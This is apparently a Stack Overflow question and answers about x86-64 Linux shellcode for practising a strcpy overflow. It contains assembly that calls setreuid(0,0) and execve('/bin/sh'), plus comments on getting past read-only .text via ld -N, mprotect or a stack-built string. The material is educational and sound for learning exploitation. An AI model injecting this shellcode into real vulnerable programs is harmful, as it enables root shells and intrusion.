# How to write inside string stored in executable .text section of ASM code?

Tags: linux, assembly, x86-64, shellcode

I'm trying to write a shellcode to play with a strcpy vulnerability, trying to understand a bit more about how that stuff works.

So far i've managed to inject a sort of "hello world" written in assembly in my vulnerable program and i got that working.

Now i'm trying to get the next step, which is to spawn a shell in my ASM code, rather than just printing a meme sentence.

I have the following ASM code, which is basically Linux example 3 from [here](https://vividmachines.com/shellcode/shellcode.html#win32ex3) updated for my x86_64 machine:

```
          ;; ASM Hello World x86_64 Linux
          global _start
          section .text
  _start:

          ;; setreuid syscall
          xor rax, rax            ; rax = syscall id
          xor rdi, rdi            ; rdi is arg0. = 0 for root priv
          xor rsi, rsi            ; rsi is arg1. = 0 for root priv
          mov al, 113             ; setreuid is syscall 113
          syscall                 ; call setreuid to get root priv if possible

          jmp short ender
        
  payload:
        
          ;;  execve syscall

          pop rdx                 ; get the string address
          xor rax, rax
          mov [rdx+7], al       ; put a null where the N is
          mov [rdx+8], rdx      ; put the address of the string where AAAAAAA is
          mov [rdx+16], rax     ; put a bunch of NULLs where the BBBBBBBB is
          mov rdi, rdx
          lea rsi, [rdx+8]
          lea rdx, [rdx+16]
          mov al, 59              ; execve is syscall 59
          syscall
        
  ender:
          call payload
          db '/bin/shNAAAAAAAABBBBBBBB'
```

As a first step i try to run this on its own, unrelated to the buffer overflow vulnerability in the C program.
When i do so, i get a segfault at `mov [rdx+7], al`.

I'm thinking this might be because of the Write XOR Execute security mechanism, that prevents me from writing over executable memory, but since i'm definitely a beginner here, **can someone confirm that's what's happening, as opposed to the code being wrong ?**

If indeed i am blocked by the security mechanism, **Can i bypass that with a call to mrotect to set my memory page as writeable AND executable?**

From the mprotect documentation, i understand i need to provide the first address of my memory page, **could i get some help on how to get this value in my asm code ?**

I did see [this other question](https://stackoverflow.com/questions/68576934/writing-from-text-section-on-text-section-data) that seems highly related and might confirm the write/exec mechanism is my first problem. It also contains a call to mprotect, but if i understand correctly they use a harcoded value of 0xff for the address of their memory page, which i don't understand.

Thanks a lot,
o7

Comment: For the standalone case, you can just use `ld -N` to have writable `.text`.

Comment: Another alternative used to be to put your code+data in `.data` and make it executable, but that's less convenient especially these days when `ld -z execstack` doesn't use READ_IMPLIES_EXEC to make *everything* executable.  And tools like GDB are less convenient for single-stepping the asm in disassembly mode when it's not in the `.text` section.

Comment: To make an `mprotect` system call, you get the address of the page containing `_start` with `lea rdi, [rel _start]` / `and rdi, -4096`.  This is x86-64 so you have RIP-relative LEA.  Or just `mov edi, _start` in a non-PIE.  [How to load address of function or label into register](https://stackoverflow.com/q/57212012) / [Reading program counter directly](https://stackoverflow.com/q/599968)

Comment: Yes, `.text` sections are read only. You could use `mprotect` but it's not clear why you should. Just make the string on the stack at runtime. You can pad it by adding superfluous `/` in the path and you can push a zero by zeroing a register.